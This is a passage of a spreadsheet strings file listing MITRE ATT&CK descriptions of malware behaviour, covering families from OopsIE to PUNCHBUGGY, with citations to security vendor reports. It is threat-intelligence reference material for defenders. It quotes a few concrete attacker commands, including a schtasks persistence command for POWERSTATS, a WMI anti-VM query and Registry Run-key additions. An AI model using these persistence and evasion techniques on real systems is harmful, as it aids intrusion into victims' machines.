    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. [OopsIE](https://attack.mitre.org/software/S0264) also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates a scheduled task to run itself every three minutes.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) encodes data in hexadecimal format over the C2 channel.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) performs several anti-VM and sandbox checks on the victim's machine. One technique the group has used was to perform a WMI query &lt;code&gt;SELECT * FROM MSAcpi_ThermalZoneTemperature&lt;/code&gt; to check the temperature to see if it’s running in a virtual environment.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks to see if the system is configured with "Daylight" time and checks for a specific region to be set for the timezone.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates and uses a VBScript as part of its persistent execution.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses HTTP for C2 communications.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the command prompt to execute commands on the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses WMI to perform discovery techniques.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) has used Technet and Pastebin web pages for command and control.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim drive information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can overwrite Registry settings to reduce its visibility on the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can download files onto the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) strings are base64 encoded, such as the embedded DLL known as MockDll.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather a process list from the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses process hollowing and [Regsvr32](https://attack.mitre.org/techniques/T1218/010) to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) and regsvr32 to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim's Internet Explorer version.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim OS version and whether it is 64 or 32 bit.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim proxy information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can execute shell commands.(Citation: Proofpoint Leviathan Oct 2017) [Orz](https://attack.mitre.org/software/S0229) can execute commands with JavaScript.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can copy files and Registry data from compromised hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can parse e-mails on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) has the ability to encode data.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use HTTP and HTTPS in communications with remote hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use native command line for execution.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has been loaded onto Exchange servers and disguised as an ISAPI filter (DLL file). The IIS w3wp.exe process then loads the malicious DLL.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to list its directory and logical drives.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) captures and DES-encrypts credentials before writing the username and password to a log file, &lt;code&gt;C:\log.txt&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses the filename owaauth.dll, which is a legitimate file that normally resides in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\&lt;/code&gt;; the malicious file by the same name is saved in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to timestop a file or directory.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). It is installed as an ISAPI filter on Exchange servers and shares characteristics with the [China Chopper](https://attack.mitre.org/software/S0020) Web shell.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to create reverse shells with Perl scripts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list and extract data from SQL databases.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to copy files on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use a decryption mechanism to process a user supplied password and allow execution.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can delete scripts from a subdirectory of /tmp after they are run.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list files and file characteristics including extension, size, ownership, and permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can upload and download files to and from compromised hosts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to modify file permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can display the /etc/passwd file on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can scan networks for open ports and listening services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use encryption and base64 encoding to hide strings and to enforce access control once deployed.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can list PHP server configuration details.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can issue commands via HTTP POST.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can gain remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) added junk data to outgoing UDP packets to peer implants.(Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of manipulating the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) communicates via ICMP for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of creating reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>An older variant of [PLAINTEE](https://attack.mitre.org/software/S0254) performs UAC bypass.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) has downloaded and executed additional plugins.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses &lt;code&gt;reg add&lt;/code&gt; to add a Registry Run key for persistence.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) performs the &lt;code&gt;tasklist&lt;/code&gt; command to list running processes.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) gains persistence by adding the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) encodes C2 beacons using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) collects general system enumeration data about the infected machine and checks the OS version.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the victim’s IP address.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses cmd.exe to execute commands on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved credentials from web browsers.(Citation: TrendMicro BlackTech June 2017)(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list drives and files on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to upload and download files to and from an infected host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list processes on the compromised host.(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to execute shell commands on the compromised host.(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has used AOL Instant Messenger for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) has been delivered through compromised sites acting as watering holes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can conduct file browsing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can perform screen capturing.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) can identify system information, including battery status.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) encrypts C2 traffic with AES and RSA.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uploads data in 2048-byte chunks.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a DGA to derive command and control URLs from a word list.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) downloads and executes additional PowerShell code and Windows binaries.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses PowerShell to execute various commands, one to execute its payload.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) uses a WMI event subscription to establish persistence.(Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) has been observed being used to download [TEXTMATE](https://attack.mitre.org/software/S0146) and the Cobalt Strike Beacon payload onto victims.(Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>If the victim is using PowerShell 3.0 or later, [POWERSOURCE](https://attack.mitre.org/software/S0145) writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in &lt;code&gt;%PROGRAMDATA%\Windows\&lt;/code&gt;.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) queries Registry keys in preparation for setting Run keys to achieve persistence.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.(Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has encrypted C2 traffic with RSA.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can upload files from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can deobfuscate the main backdoor code.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can disable Microsoft Office Protected View by changing Registry keys.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use DDE to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has connected to C2 servers through proxies.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\, D:\, E:\ and, F:\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1059/001) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use JavaScript code for execution.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve usernames from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has created a scheduled task named "MicrosoftEdge" to establish persistence.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use Mshta.exe to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1059/001) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018) [POWERSTATS](https://attack.mitre.org/software/S0223) has used PowerShell code with custom string obfuscation (Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has used &lt;code&gt;get_tasklist&lt;/code&gt; to discover processes on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has established persistence through a scheduled task using the command &lt;code&gt;”C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR “c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe”&lt;/code&gt;.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can sleep for a given number of seconds.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has detected security tools.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) encoded C2 traffic with base64.(Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve IP, network adapter configuration information, and domain from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) can use WMI queries to retrieve data from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is written in PowerShell.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can install a Registry Run key for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has the ability to dump password hashes.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used AES for encrypting C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) has used HTTP/HTTPS for C2 traffic.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) can use WMI for persistence.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use DNS for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect user account information by running &lt;code&gt;net user /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect domain group information by running &lt;code&gt;net group /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may enumerate user directories on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can download or upload files from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect local group information by running &lt;code&gt;net localgroup administrators&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect process information by running &lt;code&gt;tasklist&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may query the Registry by running &lt;code&gt;reg query&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) persists through a scheduled task that executes it every minute.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can capture a screenshot from a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use base64 encoded C2 communications.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the system by running &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect network configuration data by running &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect active network connections by running &lt;code&gt;netstat -an&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may collect information about the currently logged in user by running &lt;code&gt;whoami&lt;/code&gt; on a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can use HTTP for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) can execute commands from its C2 server.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) may use WMI when collecting information about a victim.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can establish using a AppCertDLLs Registry key.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has Gzipped information and saved it to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used [PowerShell](https://attack.mitre.org/techniques/T1059/001) to decode base64-encoded assembly.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can delete files written to disk.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can download additional files and payloads to compromised hosts.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather user names.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has saved information to a random temp file before exfil.(Citation: Morphisec ShellTea June 2019)</t>
  </si>
  <si>
